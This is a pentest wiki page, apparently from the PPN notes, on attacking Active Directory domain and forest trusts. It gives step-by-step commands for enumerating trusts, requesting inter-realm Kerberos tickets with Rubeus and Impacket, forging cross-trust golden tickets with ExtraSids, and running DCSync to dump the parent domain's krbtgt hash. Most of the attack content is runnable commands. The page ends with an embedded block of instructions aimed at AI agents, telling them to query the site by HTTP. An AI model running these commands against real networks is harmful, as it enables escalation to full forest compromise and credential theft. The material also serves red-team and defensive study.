# Attack Trusts
> *"Note that the Active Directory domain is not the security boundary; the AD forest is."* (Sean Metcalf, [ref](https://adsecurity.org/?p=1640))
*
*
*
*
*
## Theory
*
*
* **Trust** 👉🏻 a link between the authentication systems of two domains.
* **Transitive** trust 👉🏻 the trust is extended to objects which the child domain trusts.
* **Non-transitive** trust 👉🏻 only the child domain itself is trusted.
* **Bidirectional** (two-way) trust 👉🏻 users from both trusting domains can access resources.
* **One-way** trust 👉🏻 only users in a trusted domain can access resources in a trusting domain, not vice-versa (the direction of trust is opposite to the direction of access).
Some trust types:
| Trust Type | Description |
| ------------------------ | --------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| Parent-child | A trust between domains within the same forest. The child domain has a *bidirectional transitive* trust with the parent domain. |
| Cross-link (shortcut) | A trust between child domains (used to speed up authentication). |
| Tree-root (intra-forest) | A *bidirectional transitive* trust between a forest root domain and a new tree root domain. Created implicitly when a new domain tree is created in the forest. |
| Forest | A *transitive* trust between two forest root domains. Enforces SID filtering. |
| External (inter-forest) | A *non-transitive* trust between two separate domains in separate forests that are not already joined by a forest trust. Enforces SID filtering. |
## Enumeration
Get forest object:
```
PV2 > Get-NetForest [-Forest megacorp.local]
PV3 > Get-Forest [-Forest megacorp.local]
```
Get all domains in a fores:
```
PV2 > Get-NetForestDomain [-Forest megacorp.local]
PV3 > Get-ForestDomain [-Forest megacorp.local]
```
Enum trusts for current domain via `nltest` and .NET:
```
Cmd > nltest /trusted_domains /v
PS > ([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()
PS > ([System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()).GetAllTrustRelationships()
```
Enum trusts via Win32 API and LDAP:
```
PV2 > Get-NetDomainTrust [-Domain megacorp.local] | ft
PV3 > Get-DomainTrust -API [-Domain megacorp.local] | ft
PV2 > Get-NetDomainTrust -LDAP [-Domain megacorp.local] | ft
PV3 > Get-DomainTrust [-Domain megacorp.local] | ft
```
Build domain trust mapping:
```
PV2 > Invoke-MapDomainTrust [-Domain megacorp.local] | ft
PV3 > Get-DomainTrustMapping [-Domain megacorp.local] | ft
```
Transitive trusts resolution:
```
$ python bloodyAD.py -d megacorp.local -u snovvcrash -p 'Passw0rd!' --host 192.168.1.11 get trusts --transitive-trust --dns 192.168.1.11
```
No authentication enumeration via MS-NRPC (Netlogon) with [https://github.com/sud0Ru/NauthNRPC](https://github.com/snovvcrash/PPN/blob/master/pentest/infrastructure/ad/NauthNRPC/README.md):
```
$ python3 nauth.py -t 192.168.1.11
```
### Visualization (yEd)
*
*
*
*
```
PV2 > Invoke-MapDomainTrust | Export-Csv -NoTypeInformation trusts.csv
PV3 > Get-DomainTrustMapping | Export-Csv -NoTypeInformation trusts.csv
$ git clone https://github.com/snovvcrash/TrustVisualizer && cd TrustVisualizer
$ pip3 install -r requirements.txt
$ python3 TrustVisualizer.py trusts.csv
```
## Request a Foreign User TGT with Rubeus
Having just an RC4/AES keys of a user in target forest (that's a foreign user in target domain, but a native user in current domain), we can request Kerberos tickets manually with Rubeus.
Request TGT for that user in current domain:
```
beacon> execute-assembly Rubeus.exe asktgt /user:snovvcrash /domain:megacorp.local /aes256:94b4d075fd15ba856b4b7f6a13f76133f5f5ffc280685518cad6f732302ce9ac /opsec /nowrap
```
Request inter-realm TGT from current domain to the target domain:
```
beacon> execute-assembly Rubeus.exe asktgs /service:krbtgt/megacorp.external /domain:megacorp.local /dc:DC1.megacorp.local /ticket: /nowrap
```
Use inter-realm TGT to request a TGS in the target domain:
```
beacon> execute-assembly Rubeus.exe asktgs /service:cifs/DC1.megacorp.external /domain:megacorp.external /dc:DC1.megacorp.external /ticket: /nowrap
```
This [PR](https://github.com/fortra/impacket/pull/1431) helps to use such tickets with Impacket.
## Request an Inter-Realm TGT with Impacket
Request a TGT in current domain:
```
$ getTGT.py -aesKey megacorp.local/snovvcrash -dc-ip 192.168.1.11
```
Request an IR TGT for the foreign domain in current domain:
```
$ KRB5CCNAME=snovvcrash.ccache getST.py -spn 'krbtgt/MEGACORP.EXTERNAL' -k -no-pass megacorp.local/snovvcrash -dc-ip 192.168.1.11 -debug
```
Request an ST in foreign domain:
```
$ KRB5CCNAME=snovvcrash_megacorp_external.ccache getST.py -spn 'ldap/DC01.MEGACORP.EXTERNAL' -k -no-pass megacorp.external/snovvcrash -dc-ip 192.168.1.22 -debug
```
## sIDHistory/ExtraSids Hopping
*
*
Abusing Bidirectional ParentChild (`WITHIN_FOREST`) trust between **child.megacorp.local ⟷ megacorp.local**.
Check if SID filtering is enabled for a trust:
```
Cmd > netdom.exe trust child.megacorp.local /domain:megacorp.local /quarantine
SID filtering is not enabled for this trust. All SIDs presented in an
authentication request from this domain will be honored.
```
### Raise Child
*
*
*
*
For creating a cross-trust golden ticket (Golden Ticket + ExtraSid) we'll need:
1. Child domain FQDN (`child.megacorp.local`);
2. Name of the child domain's DC machine account and its RID (`DC01$`, `1337`);
3. SID of the child domain (`S-1-5-21-4266912945-3985045794-2943778634`);
4. SID of the parent domain (`S-1-5-21-2284550090-1208917427-1204316795`);
5. Compomised krbtgt hash from the child domain (`00ff00ff00ff00ff00ff00ff00ff00ff`);
6. ???
7. PROFIT.
**1.** Child domain FQDN:
```
PS > $env:userdnsdomain
CHILD.MEGACORP.LOCAL
```
**2.** Name of the child domain's DC machine account and its RID:
{% tabs %}
{% tab title="Windows" %}
```
PV2 > (Get-NetComputer -ComputerName DC01.child.megacorp.local -FullData | select ObjectSID).ObjectSID
PV3 > (Get-DomainComputer DC01.child.megacorp.local | select ObjectSID).ObjectSID
S-1-5-21-4266912945-3985045794-2943778634-1337
```
{% endtab %}
{% tab title="Linux" %}
```
$ lookupsid.py megacorp.local/snovvcrash:'Passw0rd!'@DC01.megacorp.local | grep SidTypeUser | grep -i DC01
1337: MEGACORP\DC01$ (SidTypeUser)
```
{% endtab %}
{% endtabs %}
**3.** SID of the child domain:
{% tabs %}
{% tab title="Windows" %}
```
PV > Get-DomainSID
S-1-5-21-4266912945-3985045794-2943778634
```
{% endtab %}
{% tab title="Linux" %}
```
$ lookupsid.py megacorp.local/snovvcrash:'Passw0rd!'@DC01.megacorp.local 0 | grep 'Domain SID'
[*] Domain SID is: S-1-5-21-4266912945-3985045794-2943778634
```
{% endtab %}
{% endtabs %}
**4.** SID of the parent domain:
```
PS > (New-Object System.Security.Principal.NTAccount("megacorp.local","krbtgt")).Translate([System.Security.Principal.SecurityIdentifier]).Value
S-1-5-21-2284550090-1208917427-1204316795-502
```
Create cross-trust golden ticket:
{% tabs %}
{% tab title="Windows" %}
```
mimikatz # kerberos::golden /domain:child.megacorp.local /user:DC01$ /id:1337 /groups:516 /sid:S-1-5-21-4266912945-3985045794-2943778634 /sids:S-1-5-21-2284550090-1208917427-1204316795-516,S-1-5-9 /krbtgt:00ff00ff00ff00ff00ff00ff00ff00ff /ptt [/startoffset:-10 /endin:60 /renewmax:10080]
```
{% endtab %}
{% tab title="Linux" %}
```
$ ticketer.py -domain child.megacorp.local -domain-sid S-1-5-21-4266912945-3985045794-2943778634 {-nthash | -aesKey } [-groups 516] [-user-id 1337] [-duration 87600] -extra-sid S-1-5-21-2284550090-1208917427-1204316795-516,S-1-5-9 'DC01$'
```
{% endtab %}
{% endtabs %}
For DCSyncing we'll need only parent domain FQDN (`megacorp.local`):
```
PS > ([System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest())[0].RootDomain.Name
megacorp.local
```
DCSync:
```
mimikatz # lsadump::dcsync /user:megacorp.local\krbtgt /domain:megacorp.local
```
### Inter-Realm TGT Forging
Manually craft an IR TGT injecting a privileged SID (example for `WITHIN_FOREST` trust but can also be adopted for `TREAT_AS_EXTERNAL` [case](#attack-forest-trusts)):
```
$ ticketer.py -spn 'krbtgt/MEGACORP.LOCAL' -nthash -domain child.megacorp.local -domain-sid -extra-sid -516,S-1-5-9 [-groups 516] [-user-id ] 'DC01$'
```
Request an ST for DCSync:
```
$ KRB5CCNAME='DC01$.ccache' getST.py -spn 'CIFS/DC02.megacorp.local' -k -no-pass megacorp.local/'DC01$' -dc-ip 192.168.1.11 -debug
```
DCSync:
```
$ KRB5CCNAME='DC01$_CIFS_DC02.ccache' secretsdump.py -k -no-pass DC02.megacorp.local -dc-ip 192.168.1.11 -just-dc-user 'MEGACORP\krbtgt' -debug
```
## UnD + PrinterBug
*
*
*
*
*
{% content-ref url="kerberos/delegation-abuse/kud" %}
[kud](https://ppn.snovvcra.sh/pentest/infrastructure/ad/kerberos/delegation-abuse/kud)
{% endcontent-ref %}
Can be abused either if **CVE-2019-0683** is not fixed or if `EnableTGTDelegation` is enabled for the trusted forest:
```
Cmd > netdom.exe trust forestB.net /domain:forestA.net /EnableTGTDelegation:Yes
```
## Attack Forest Trusts
*
*
List foreign users and users from foreign groups:
```
PV2 > Find-ForeignUser -Domain [-Domain megacorp.local]
PV3 > Get-DomainForeignUser [-Domain megacorp.local]
PV2 > Find-ForeignGroup -Domain [-Domain megacorp.local]
PV3 > Get-DomainForeignGroupMember [-Domain megacorp.local]
PV > Convert-SidToName ...
```
List user accounts from a target domain with SPNs set for [Kerberoasting](https://ppn.snovvcra.sh/pentest/infrastructure/kerberos/roasting#kerberoasting):
```
PV3 > Get-DomainUser -SPN -Domain megacorp.local | ? {$_.samAccountName -ne "krbtgt"} | select samAccountName,memberOf,servicePrincipalName | fl
PS > .\SharpView.exe Get-DomainUser -SPN -Domain megacorp.local -Properties samAccountName,memberOf,servicePrincipalName -Filter '(!(samAccountName=krbtgt))'
```
If SID history is enabled (e. g., if domain is on its migration period, `netdom trust b.net /d:a.net /enablesidhistory:yes`) then the forest trust is treated as *external*.
We can try to locate non-default (with RID greater than 1000) admin account:
```
PV2 > Get-NetGroupMember -GroupName "Administrators" -Domain -Domain b.net
PV3 > Get-DomainGroupMember -Identity "Administrators" -Domain b.net
```
If such an account is a member of a domain local security group (not a global group like `Enterprise Admins` or `Domain Admins`) and allows us to compromise a user or a computer in the target domain, we can create a cross-trust golden ticket for her the same way as described [above](#sidhistory-extrasids-hopping).
### CVE-2020-0665
*
*
*
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://ppn.snovvcra.sh/pentest/infrastructure/ad/attack-trusts.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.